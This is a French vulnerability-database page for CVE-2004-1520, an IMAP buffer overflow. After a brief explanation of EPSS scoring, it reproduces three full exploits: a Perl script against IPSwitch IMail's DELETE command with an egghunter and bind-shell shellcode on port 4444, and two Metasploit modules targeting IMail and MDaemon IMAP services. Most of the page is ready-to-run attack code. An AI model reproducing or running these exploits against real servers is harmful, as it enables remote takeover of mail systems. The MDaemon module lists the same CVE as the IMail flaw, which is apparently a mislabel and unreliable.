CVE-2004-1520 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/perl -w ################################### # # IPSwitch-IMail-8.13-DELETE # # Discovered by : Muts # Coded by : Zatlander # WWW.WHITEHAT.CO.IL # ################################## # # Plain vanilla stack overflow in the DELETE command # Restrictions: # - Need valid authentication credentials # - Input buffer only allows characters between x20 -> x7e # # Credits: # - http://www.metasploit.org - HD Moore for the metasploit shellcode # - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii shellcode generator # - http://www.hick.org - for the syscall egghunt code in the paper "Understanding Windows Shellcode" # ################################## use IO::Socket; use Getopt::Std; use Mail::IMAPClient; print "Exploit for the IPSwitch IMail DELETE buffer overflow\n"; print "C0d3d by Zatlander\n"; print "Discovered by Muts\n"; print "WWW.WHITEHAT.CO.IL\n"; print "For hacking purposes only!!!\n\n"; # Find shellcode with signature "w00tw00t"; start from esp # from 0 -> $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PLMvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA"; $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PLMtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA"; # Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin ) $shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGnkbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvahGZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oRuFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGyjDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJKOKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA"; getopts("h:u:p:", \%args); if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) { print "Usage: $0 -h [host] -u [username] -p [password]\n"; exit;} $usr = $args{u}; $pwd = $args{p}; $host = $args{h}; # jb +20; jnb +20 -> jump over return address (0x21 is first ascii safe offset) $jmp21 = "r!s!"; # 0x6921526A -> pointer to "CALL [EDX+8]" ends up in return address ########################################################################## # This should hopefully be the only version dependent variable here. # Find an ASCII safe address pointing to a CALL [EDX+8] for your OS ########################################################################## $calledx8 = "jR!i"; # aAA aligns ESP with the egghunter shellcode (popad, pop, pop) $asciieh = "aAA" . $egghunter; $asciisc = "w00tw00t" . $shellcode; $email = "From: \"The guy hacking you\" <a\@b.com>\r\n" . "To: \"Poor You\" <b\@c.com>\r\n" . "Subject: $asciisc\r\n" . "Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n" . "Message-ID: <000101c4c1acdcndj6d69b90$5e01a8c0\@snorlax>\r\n" . "Content-Type: text/plain;\r\n\tcharset=\"us-ascii\"\r\n" . "Content-Transfer-Encoding: 7bit\r\n" . "\r\n" . $asciisc; $payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "\r\n"; print "Login in to $host as $usr/$pwd\n"; my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or die "Cannot connect: $@"; print "count: " . $imap->message_count("Inbox") . "\n"; print "Sending EGG\n"; $imap->select("Inbox") or die "Could not select: $@\n"; my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@"; $msg = $imap->message_string($uid) or die "Cannot get message: $@"; #$msg = $imap->body_string($uid) or die "Cannot get message: $@"; #print "retrieving $uid back: $msg\n"; print "Overflowing DELETE\n"; $imap->delete($payload) or die "Cannot delete: $@n"; print("Finished...\n"); # milw0rm.com [2004-11-12]

## # $Id: imail_delete.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) super(update_info(info, 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 614, 'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric), 'StackAdjustment' => -3500, 'EncoderOptions' => { 'BufferRegister' => 'EDX', } }, 'Platform' => 'win', 'Targets' => [ # alphanum rets :(, will look more into it later ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }], ], 'DisclosureDate' => 'Nov 12 2004', 'DefaultTarget' => 0)) end def exploit connect_login print_status("Sending overflow string...") req = 'A683 DELETE ' req << payload.encoded # Jump over code req << "\x74\x32\x75\x30" req << [target.ret].pack('V') req << rand_text_alphanumeric(44) # GetEIP code req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59" req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59" # Alphanumeric jmp back (edx context) req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41" req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" # Run off the stack, so we don't kill our payload, or something... req << rand_text_alphanumeric(600) # Terminate the request req << "\r\n" sock.put(req) handler disconnect end end

## # $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) super(update_info(info, 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', 'Description' => %q{ This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts. }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, 'Version' => '$Revision: 9583 $', 'References' => [ [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], ], 'DisclosureDate' => 'Nov 12 2004', 'DefaultTarget' => 0)) end def exploit connect print_status("Asking for CRAM-MD5 authentication...") sock.put("a001 authenticate cram-md5\r\n") res = sock.get_once print_status("Received CRAM-MD5 answer: #{res.chomp}") # Magic no return-address exploitation ninjaness! buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" req = Rex::Text.encode_base64(buf) + "\r\n" sock.put(req) res = sock.get_once print_status("Received authentication reply: #{res.chomp}") print_status("Sending LOGOUT to close the thread and trigger an exception") sock.put("a002 LOGOUT\r\n") res = sock.get_once print_status("Received LOGOUT reply: #{res.chomp}") select(nil,nil,nil,1) handler disconnect end end